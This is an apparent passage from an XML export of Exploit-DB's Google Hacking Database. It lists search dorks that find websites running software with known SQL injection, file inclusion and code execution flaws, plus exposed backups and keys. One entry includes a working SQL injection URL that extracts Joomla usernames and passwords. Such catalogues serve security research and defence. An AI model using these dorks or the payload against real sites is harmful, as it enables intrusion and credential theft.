<query>filetype:php intitle:&quot;paNews v2.0b4&quot;</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=filetype%3Aphp+intitle%3A%22paNews+v2.0b4%22+</querystring>
<edb></edb>
<date>2005-03-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>5899</id>
<link>https://www.exploit-db.com/ghdb/5899</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>filetype:php inurl:&quot;/general/login.php?PHPSESSID=&quot;</shortDescription>
<textualDescription># Google Dork: filetype:php inurl:&quot;/general/login.php?PHPSESSID=&quot;
# By using this dork, sites running PHPCollab 2.5, which are prone to SQL
Injection and other multiple vulnerabilities, can be found. This dork is
linked to the following existing exploit:
https://www.exploit-db.com/exploits/37004
# Date: 07/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>filetype:php inurl:&quot;/general/login.php?PHPSESSID=&quot;</query>
<querystring>https://www.google.com/search?q=filetype:php inurl:&quot;/general/login.php?PHPSESSID=&quot;</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>499</id>
<link>https://www.exploit-db.com/ghdb/499</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>filetype:php inurl:index.php inurl:&quot;module=subjects&quot; inurl:&quot;func=*&quot; (listpages| viewpage | listcat)</shortDescription>
<textualDescription>Reportedly the PostNuke Modules Factory Subjects module is affected by a remote SQL injection vulnerability. http://securityfocus.com/bid/11148/discussion/</textualDescription>
<query>filetype:php inurl:index.php inurl:&quot;module=subjects&quot; inurl:&quot;func=*&quot; (listpages| viewpage | listcat)</query>
<querystring>https://www.google.com/search?q=filetype%3Aphp+inurl%3Aindex.php+inurl%3A%22module%3Dsubjects%22+inurl%3A%22func%3D*%22+%28listpages%7C+viewpage+%7C+listcat%29&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-09-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>2827</id>
<link>https://www.exploit-db.com/ghdb/2827</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>FrontAccounting</shortDescription>
<textualDescription>FrontAccounting 1.12 Build 31 Remote File Inclusion Vulnerability - CVE: 2007-4279: https://www.exploit-db.com/exploits/4269</textualDescription>
<query>FrontAccounting</query>
<querystring>https://www.google.com/search?q=FrontAccounting</querystring>
<edb>https://www.exploit-db.com/exploits/4269</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2324</id>
<link>https://www.exploit-db.com/ghdb/2324</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Help Desk Software by Kayako SupportSuite v3.70.02</shortDescription>
<textualDescription>Kayako eSupport v3.70.02 SQL Injection Vulnerability - CVE: 2010-2911: https://www.exploit-db.com/exploits/14392</textualDescription>
<query>Help Desk Software by Kayako SupportSuite v3.70.02</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Help+Desk+Software+by+Kayako+SupportSuite+v3.70.02</querystring>
<edb>https://www.exploit-db.com/exploits/14392</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1125</id>
<link>https://www.exploit-db.com/ghdb/1125</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>http://www.google.com/search?q=intitle:%22WEB//NEWS+Personal+Newsmanagement%22+intext:%22%C2%A9+2002-2004+by+Christian+Scheb+-+Stylemotion.de%22%2B%22</shortDescription>
<textualDescription>WEB//NEWS 1.4 is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.</textualDescription>
<query>intitle:&quot;WEB//NEWS Personal Newsmanagement&quot; intext:&quot;© 2002-2004 by Christian Scheb - Stylemotion.de&quot;+&quot;Version 1.4 &quot;+&quot;Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22WEB//NEWS+Personal+Newsmanagement%22+intext:%22%C2%A9+2002-2004+by+Christian+Scheb+-+Stylemotion.de%22%2B%22Version+1.4+%22%2B%22Login%22&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-09-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>1963</id>
<link>https://www.exploit-db.com/ghdb/1963</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Igloo (interest group glue)</shortDescription>
<textualDescription>Igloo 0.1.9 (Wiki.php) Remote File Include Vulnerability - CVE: 2006-2819: https://www.exploit-db.com/exploits/1863</textualDescription>
<query>Igloo (interest group glue)</query>
<querystring>https://www.google.com/search?q=Igloo+(interest+group+glue)</querystring>
<edb>https://www.exploit-db.com/exploits/1863</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6018</id>
<link>https://www.exploit-db.com/ghdb/6018</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>index of /wp-content/themes/avada</shortDescription>
<textualDescription>Dork: index of /wp-content/themes/avada
Description: This Google dork lists out Advisories and Vulnerabilities
about the Avada theme. Ref: https://wpvulndb.com/vulnerabilities/10209
Author: Abhi Chitkara
</textualDescription>
<query>index of /wp-content/themes/avada</query>
<querystring>https://www.google.com/search?q=index of /wp-content/themes/avada</querystring>
<edb></edb>
<date>2020-05-05</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6019</id>
<link>https://www.exploit-db.com/ghdb/6019</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>index of /wp-content/themes/onetone/</shortDescription>
<textualDescription>Dork: index of /wp-content/themes/onetone/
Description: This Google dork lists out Advisories and Vulnerabilities
about the onetone theme. Ref: https://wpvulndb.com/vulnerabilities/10165
Author: Abhi Chitkara
</textualDescription>
<query>index of /wp-content/themes/onetone/</query>
<querystring>https://www.google.com/search?q=index of /wp-content/themes/onetone/</querystring>
<edb></edb>
<date>2020-05-05</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6264</id>
<link>https://www.exploit-db.com/ghdb/6264</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>index of /wp-content/uploads/backupbuddy</shortDescription>
<textualDescription>Dork: index of /wp-content/uploads/backupbuddy
Description: This google dork lists out the WordPress backupbuddy.zip file
Author: Abhinav Porwal
</textualDescription>
<query>index of /wp-content/uploads/backupbuddy</query>
<querystring>https://www.google.com/search?q=index of /wp-content/uploads/backupbuddy</querystring>
<edb></edb>
<date>2020-06-10</date>
<author>Abhinav Porwal</author>
</entry>
<entry>
<id>6443</id>
<link>https://www.exploit-db.com/ghdb/6443</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Index of : wp-content/plugins/wpmudev-updates/</shortDescription>
<textualDescription>Google Dork : Index of : wp-content/plugins/wpmudev-updates/
Description: This dork will lead to getting the keys and much more
sensitive information of the directory.
(Sensitive Data Exposure).
Author : Pratik Khalane
Date: 23-07-2020
</textualDescription>
<query>Index of : wp-content/plugins/wpmudev-updates/</query>
<querystring>https://www.google.com/search?q=Index of : wp-content/plugins/wpmudev-updates/</querystring>
<edb></edb>
<date>2020-07-26</date>
<author>Pratik Khalane</author>
</entry>
<entry>
<id>2754</id>
<link>https://www.exploit-db.com/ghdb/2754</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>index.asp?archivio=OK</shortDescription>
<textualDescription>Ublog access version Arbitrary Database Disclosure: https://www.exploit-db.com/exploits/8610</textualDescription>
<query>index.asp?archivio=OK</query>
<querystring>https://www.google.com/search?q=index.asp%3Farchivio%3DOK</querystring>
<edb>https://www.exploit-db.com/exploits/8610</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3255</id>
<link>https://www.exploit-db.com/ghdb/3255</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>index.php?option=com_altas</shortDescription>
<textualDescription>Joomla Component altas 1.0 Multiple Remote SQL Injection: https://www.exploit-db.com/exploits/6002</textualDescription>
<query>index.php?option=com_altas</query>
<querystring>https://www.google.com/search?q=index.php%3Foption%3Dcom_altas</querystring>
<edb>https://www.exploit-db.com/exploits/6002</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3525</id>
<link>https://www.exploit-db.com/ghdb/3525</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>index.php?option=com_ezine</shortDescription>
<textualDescription>Joomla Component D4JeZine 2.8 Remote BLIND SQL Injection - CVE: 2007-1776: https://www.exploit-db.com/exploits/3590</textualDescription>
<query>index.php?option=com_ezine</query>
<querystring>https://www.google.com/search?q=index.php%3Foption%3Dcom_ezine&amp;</querystring>
<edb>https://www.exploit-db.com/exploits/3590</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2026</id>
<link>https://www.exploit-db.com/ghdb/2026</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>index.php?option=com_facileforms</shortDescription>
<textualDescription>Joomla Component com_facileforms 1.4.4 RFI Vulnerability - CVE: 2008-2990: https://www.exploit-db.com/exploits/5915</textualDescription>
<query>index.php?option=com_facileforms</query>
<querystring>https://www.google.com/search?q=index.php%3Foption%3Dcom_facileforms</querystring>
<edb>https://www.exploit-db.com/exploits/5915</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3706</id>
<link>https://www.exploit-db.com/ghdb/3706</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>index.php?option=com_ignitegallery</shortDescription>
<textualDescription>Submitter: TiGeR_YeMeN HaCkEr
SQL Injection: index.php?option=com_ignitegallery&amp;task=view&amp;gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users--</textualDescription>
<query>index.php?option=com_ignitegallery</query>
<querystring>https://www.google.com/search?q=inurl%3Acom_ignitegallery</querystring>
<edb></edb>
<date>2011-03-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>3286</id>
<link>https://www.exploit-db.com/ghdb/3286</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>index.php?option=com_is</shortDescription>
<textualDescription>Joomla Component is 1.0.1 Multiple Remote SQL Injection: https://www.exploit-db.com/exploits/5995</textualDescription>
<query>index.php?option=com_is</query>
<querystring>https://www.google.com/search?q=index.php%3Foption%3Dcom_is</querystring>
<edb>https://www.exploit-db.com/exploits/5995</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3314</id>
<link>https://www.exploit-db.com/ghdb/3314</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>index.php?option=com_mambads</shortDescription>
<textualDescription>Mambo Component mambads</textualDescription>
<query>index.php?option=com_mambads</query>
<querystring>https://www.google.com/search?q=index.php%3Foption%3Dcom_mambads</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2163</id>
<link>https://www.exploit-db.com/ghdb/2163</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>index.php?option=com_ongallery</shortDescription>
<textualDescription>Joomla Component OnGallery SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14659</textualDescription>
<query>index.php?option=com_ongallery</query>
<querystring>https://www.google.com/search?q=index.php%3Foption%3Dcom_ongallery</querystring>
<edb>https://www.exploit-db.com/exploits/14659</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1531</id>
<link>https://www.exploit-db.com/ghdb/1531</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>index.php?option=com_pcchess</shortDescription>
<textualDescription>PrinceClan Chess Mambo Com 0.8 Remote Inclusion Vulnerability - CVE: 2006-5044: https://www.exploit-db.com/exploits/2069</textualDescription>
<query>index.php?option=com_pcchess</query>
<querystring>https://www.google.com/search?q=index.php%3Foption%3Dcom_pcchess</querystring>
<edb>https://www.exploit-db.com/exploits/2069</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2951</id>
<link>https://www.exploit-db.com/ghdb/2951</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>index.php?option=com_swmenupro</shortDescription>
<textualDescription>Joomla/Mambo Component SWmenuFree 4.0 RFI Vulnerability - CVE: 2007-1699: https://www.exploit-db.com/exploits/3557</textualDescription>
<query>index.php?option=com_swmenupro</query>
<querystring>https://www.google.com/search?q=index.php%3Foption%3Dcom_swmenupro</querystring>
<edb>https://www.exploit-db.com/exploits/3557</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3266</id>
<link>https://www.exploit-db.com/ghdb/3266</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>index.php?option=com_vr</shortDescription>
<textualDescription>Joomla Component QuickTime VR 0.1 Remote SQL Injection: https://www.exploit-db.com/exploits/5994</textualDescription>
<query>index.php?option=com_vr</query>
<querystring>https://www.google.com/search?q=index.php%3Foption%3Dcom_vr</querystring>
<edb>https://www.exploit-db.com/exploits/5994</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2802</id>
<link>https://www.exploit-db.com/ghdb/2802</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>index2.php?option=com_joomlaboard</shortDescription>
<textualDescription>Joomla Component Joomlaboard 1.1.1 (sbp) RFI Vulnerability: https://www.exploit-db.com/exploits/3560</textualDescription>
<query>index2.php?option=com_joomlaboard</query>
<querystring>https://www.google.com/search?q=index2.php%3Foption%3Dcom_joomlaboard</querystring>
<edb>https://www.exploit-db.com/exploits/3560</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2905</id>
<link>https://www.exploit-db.com/ghdb/2905</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>infusions/manuals/manuals.php?manual=</shortDescription>
<textualDescription>PHP-Fusion Mod manuals (manual) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6681</textualDescription>
<query>infusions/manuals/manuals.php?manual=</query>
<querystring>https://www.google.com/search?q=infusions%2Fmanuals%2Fmanuals.php%3Fmanual%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6681</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2381</id>
<link>https://www.exploit-db.com/ghdb/2381</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>infusions/raidtracker_panel/thisraidprogress.php?</shortDescription>
<textualDescription>PHP-Fusion Mod raidtracker_panel (INFO_RAID_ID) SQL Injection - CVE: 2008-4521: https://www.exploit-db.com/exploits/6682</textualDescription>
<query>infusions/raidtracker_panel/thisraidprogress.php?</query>
<querystring>https://www.google.com/search?q=infusions/raidtracker_panel/thisraidprogress.php%3F</querystring>
<edb>https://www.exploit-db.com/exploits/6682</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2726</id>
<link>https://www.exploit-db.com/ghdb/2726</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>infusions/recept/recept.php?</shortDescription>
<textualDescription>PHP-Fusion Mod recept (kat_id) SQL Injection Vulnerability - CVE: 2008-4527: https://www.exploit-db.com/exploits/6683</textualDescription>
<query>infusions/recept/recept.php?</query>
<querystring>https://www.google.com/search?q=infusions/recept/recept.php%3F</querystring>
<edb>https://www.exploit-db.com/exploits/6683</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2568</id>
<link>https://www.exploit-db.com/ghdb/2568</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>infusions/triscoop_race_system/race_details.php?</shortDescription>
<textualDescription>PHP-Fusion Mod triscoop_race_system (raceid) SQL Injection Vuln: https://www.exploit-db.com/exploits/6684</textualDescription>
<query>infusions/triscoop_race_system/race_details.php?</query>
<querystring>https://www.google.com/search?q=infusions/triscoop_race_system/race_details.php%3F</querystring>
<edb>https://www.exploit-db.com/exploits/6684</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3595</id>
<link>https://www.exploit-db.com/ghdb/3595</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>insite: SmarterMail Enterprise 7.1</shortDescription>
<textualDescription>https://www.exploit-db.com/exploits/15185/</textualDescription>
<query>SmarterMail Enterprise 7.1</query>
<querystring>https://www.google.com/search?q=:insite%3A+SmarterMail+Enterprise+7.1</querystring>
<edb>https://www.exploit-db.com/exploits/15185</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3323</id>
<link>https://www.exploit-db.com/ghdb/3323</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>insite: SmarterMail Enterprise 7.1</shortDescription>
<textualDescription>SmarterMail 7.1.3876 Directory Traversal Vulnerability - CVE: 2010-3486: https://www.exploit-db.com/exploits/15048</textualDescription>
<query>insite: SmarterMail Enterprise 7.1</query>
<querystring>https://www.google.com/search?q=insite:+SmarterMail+Enterprise+7.1</querystring>
<edb>https://www.exploit-db.com/exploits/15048</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2606</id>
<link>https://www.exploit-db.com/ghdb/2606</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext : &quot;Website by conceptinternetltd&quot;</shortDescription>
<textualDescription>Concept E-commerce SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14512</textualDescription>
<query>intext : &quot;Website by conceptinternetltd&quot;</query>
<querystring>https://www.google.com/search?q=intext+:+%22Website+by+conceptinternetltd%22</querystring>
<edb>https://www.exploit-db.com/exploits/14512</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1942</id>
<link>https://www.exploit-db.com/ghdb/1942</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext: &quot;Powered by Marinet&quot;</shortDescription>
<textualDescription>Marinet cms SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12575</textualDescription>
<query>intext: &quot;Powered by Marinet&quot;</query>
<querystring>https://www.google.com/search?q=intext:+%22Powered+by+Marinet%22</querystring>
<edb>https://www.exploit-db.com/exploits/12575</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1994</id>
<link>https://www.exploit-db.com/ghdb/1994</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext: &quot;Site developed &amp; mantained by Woodall Creative Group&quot;</shortDescription>
<textualDescription>Woodall Creative SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12576</textualDescription>
<query>intext: &quot;Site developed &amp; mantained by Woodall Creative Group&quot;</query>
<querystring>https://www.google.com/search?q=intext:+%22Site+developed+%26+mantained+by+Woodall+Creative+Group%22</querystring>
<edb>https://www.exploit-db.com/exploits/12576</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3651</id>
<link>https://www.exploit-db.com/ghdb/3651</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext: Copyright+MantisBT Group</shortDescription>
<textualDescription>Mantis Bug Tracker
http://mantisbt.org
https://www.exploit-db.com/exploits/15735/
https://www.exploit-db.com/exploits/15736/
Thanks,*
Gjoko 'LiquidWorm' Krstic*
*Information Security Engineer*
***Zero Science Lab*
Macedonian Information Security Research &amp; Development Laboratory
http://www.zeroscience.mk
+389 (0) 75 290 926
+389 (0) 77 670 886</textualDescription>
<query>intext: Copyright+MantisBT Group</query>
<querystring>https://www.google.com/search?q=intext:%20Copyright+MantisBT%20Group</querystring>
<edb>https://www.exploit-db.com/exploits/15736</edb>
<date>2010-12-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2631</id>
<link>https://www.exploit-db.com/ghdb/2631</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot; Website Design and Hosting By Netricks, Inc.&quot;</shortDescription>
<textualDescription>Website Design and Hosting By Netricks, Inc (news.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12736</textualDescription>
<query>intext:&quot; Website Design and Hosting By Netricks, Inc.&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22+Website+Design+and+Hosting+By+Netricks,+Inc.%22</querystring>
<edb>https://www.exploit-db.com/exploits/12736</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3536</id>
<link>https://www.exploit-db.com/ghdb/3536</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;2000-2001 The phpHeaven Team&quot;</shortDescription>
<textualDescription>phpMyChat 0.14.5 (SYS enter) Remote Code Execution: https://www.exploit-db.com/exploits/1646</textualDescription>
<query>intext:&quot;2000-2001 The phpHeaven Team&quot;</query>
<querystring>https://www.google.com/search?q=intext:%222000-2001+The+phpHeaven+Team%22</querystring>
<edb>https://www.exploit-db.com/exploits/1646</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1323</id>
<link>https://www.exploit-db.com/ghdb/1323</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;2000-2001 The phpHeaven Team&quot; -sourceforge</shortDescription>
<textualDescription>this is the dork for PHPMyChat</textualDescription>
<query>intext:&quot;2000-2001 The phpHeaven Team&quot; -sourceforge</query>
<querystring>https://www.google.com/search?q=intext%3A%222000-2001+The+phpHeaven+Team%22+-sourceforge+&amp;btnG=Cerca+con+Google&amp;meta=&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-04-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>1325</id>
<link>https://www.exploit-db.com/ghdb/1325</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;2000-2001 The phpHeaven Team&quot; -sourceforge</shortDescription>
<textualDescription>intext:&quot;2000-2001 The phpHeaven Team&quot; -sourceforge this is for PHPMyChat remote commands execution,advisory/poc exploits:http://retrogod.altervista.org/phpmychat_0145_xpl.htmlhttp://retrogod.altervista.org/phpmychat_015dev_xpl.html</textualDescription>
<query>intext:&quot;2000-2001 The phpHeaven Team&quot; -sourceforge</query>
<querystring>https://www.google.com/search?q=intext:%222000-2001+The+phpHeaven+Team%22+-sourceforge&amp;num=100&amp;start=0&amp;sa=N&amp;filter=0</querystring>
<edb></edb>
<date>2006-04-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>3550</id>
<link>https://www.exploit-db.com/ghdb/3550</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;2000-2001 The phpHeaven Team&quot; -sourceforge</shortDescription>
<textualDescription>phpMyChat 0.15.0dev (SYS enter) Remote Code Execution:
https://www.exploit-db.com/exploits/1647</textualDescription>
<query>intext:&quot;2000-2001 The phpHeaven Team&quot; -sourceforge</query>
<querystring>https://www.google.com/search?q=intext:%222000-2001+The+phpHeaven+Team%22+-sourceforge</querystring>
<edb>https://www.exploit-db.com/exploits/1647</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1025</id>
<link>https://www.exploit-db.com/ghdb/1025</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Calendar Program © Copyright 1999 Matt Kruse&quot; &quot;Add an event&quot;</shortDescription>
<textualDescription>This search finds all pages that allow you to add events in Mark Kruse's CalendarScript. This script seems to be VERY vulnerable to HTML injection techniques.</textualDescription>
<query>intext:&quot;Calendar Program © Copyright 1999 Matt Kruse&quot; &quot;Add an event&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22Calendar+Program+%C2%A9+Copyright+1999+Matt+Kruse%22+%22Add+an+event%22</querystring>
<edb></edb>
<date>2005-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>6329</id>
<link>https://www.exploit-db.com/ghdb/6329</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Centreon 2005-2019&quot;</shortDescription>
<textualDescription># Dork :intext:&quot;Centreon 2005-2019&quot;
# Vulnerable Service
# CVE-2019-13024
# Author : Ambadi MP
</textualDescription>
<query>intext:&quot;Centreon 2005-2019&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Centreon 2005-2019&quot;</querystring>
<edb></edb>
<date>2020-06-25</date>
<author>Ambadi MP</author>
</entry>
<entry>
<id>6102</id>
<link>https://www.exploit-db.com/ghdb/6102</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Created by John Caruso&quot; intext:&quot;Created with Simple PHP Photo Gallery&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Created by John Caruso&quot;
intext:&quot;Created with Simple PHP Photo Gallery&quot;
# SimplePHPGal 0.7 - Remote File Inclusion. This dork is linked to the
following existing exploit: https://www.exploit-db.com/exploits/48424
# Date: 19/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;Created by John Caruso&quot; intext:&quot;Created with Simple PHP Photo Gallery&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Created by John Caruso&quot; intext:&quot;Created with Simple PHP Photo Gallery&quot;</querystring>
<edb></edb>
<date>2020-05-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1968</id>
<link>https://www.exploit-db.com/ghdb/1968</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Design by BB Media.Org&quot;</shortDescription>
<textualDescription>BBMedia Design's SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12711</textualDescription>
<query>intext:&quot;Design by BB Media.Org&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Design+by+BB+Media.Org%22</querystring>
<edb>https://www.exploit-db.com/exploits/12711</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2361</id>
<link>https://www.exploit-db.com/ghdb/2361</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Design by BB Media.Org&quot;</shortDescription>
<textualDescription>BBMedia Design's (news_more.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12718</textualDescription>
<query>intext:&quot;Design by BB Media.Org&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Design+by+BB+Media.Org%22</querystring>
<edb>https://www.exploit-db.com/exploits/12718</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1953</id>
<link>https://www.exploit-db.com/ghdb/1953</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Design by MMA Creative&quot;</shortDescription>
<textualDescription>MMA Creative Design SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12706</textualDescription>
<query>intext:&quot;Design by MMA Creative&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Design+by+MMA+Creative%22</querystring>
<edb>https://www.exploit-db.com/exploits/12706</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3156</id>
<link>https://www.exploit-db.com/ghdb/3156</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Designed by Spaceacre&quot;</shortDescription>
<textualDescription>Spaceacre (SQL/XSS/HTML) Injection Vulnerabilities: https://www.exploit-db.com/exploits/12746</textualDescription>
<query>intext:&quot;Designed by Spaceacre&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Designed+by+Spaceacre%22</querystring>
<edb>https://www.exploit-db.com/exploits/12746</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3129</id>
<link>https://www.exploit-db.com/ghdb/3129</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;English for dummies&quot;</shortDescription>
<textualDescription>Mobilelib Gold v3 Local File Disclosure Vulnerability - CVE: 2009-3823: https://www.exploit-db.com/exploits/9144</textualDescription>
<query>intext:&quot;English for dummies&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22English+for+dummies%22</querystring>
<edb>https://www.exploit-db.com/exploits/9144</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2570</id>
<link>https://www.exploit-db.com/ghdb/2570</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Event List 0.8 Alpha by schlu.net &quot;</shortDescription>
<textualDescription>Joomla Component EventList 0.8 (did) SQL Injection Vulnerability - CVE: 2007-4509: https://www.exploit-db.com/exploits/4309</textualDescription>
<query>intext:&quot;Event List 0.8 Alpha by schlu.net &quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Event+List+0.8+Alpha+by+schlu.net+%22</querystring>
<edb>https://www.exploit-db.com/exploits/4309</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4289</id>
<link>https://www.exploit-db.com/ghdb/4289</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Forum software by XenForo™&quot;</shortDescription>
<textualDescription>intext:&quot;Forum software by XenForo™&quot;
XenForo SQLi Vulnerability. - https://www.exploit-db.com/exploits/39849/
&quot;value&quot; parameter unsanitized.</textualDescription>
<query>intext:&quot;Forum software by XenForo™&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Forum software by XenForo™&quot;</querystring>
<edb>https://www.exploit-db.com/exploits/39849</edb>
<date>2016-05-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>2830</id>
<link>https://www.exploit-db.com/ghdb/2830</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Free Ecommerce Shopping Cart Software by ViArt&quot; +&quot;Your shopping cart is empty!&quot; + &quot;Products Search&quot; +&quot;Advanced Search&quot; + &quot;All Categories&quot;</shortDescription>
<textualDescription>ViArt Shopping Cart 3.5 Multiple Remote Vulnerabilities - CVE: 2008-6758: https://www.exploit-db.com/exploits/7628</textualDescription>
<query>intext:&quot;Free Ecommerce Shopping Cart Software by ViArt&quot; +&quot;Your shopping cart is empty!&quot; + &quot;Products Search&quot; +&quot;Advanced Search&quot; + &quot;All Categories&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22Free+Ecommerce+Shopping+Cart+Software+by+ViArt%22+%2B%22Your+shopping+cart+is+empty%21%22+%2B+%22Products++Search%22+%2B%22Advanced+Search%22+%2B+%22All+Categories%22</querystring>
<edb>https://www.exploit-db.com/exploits/7628</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
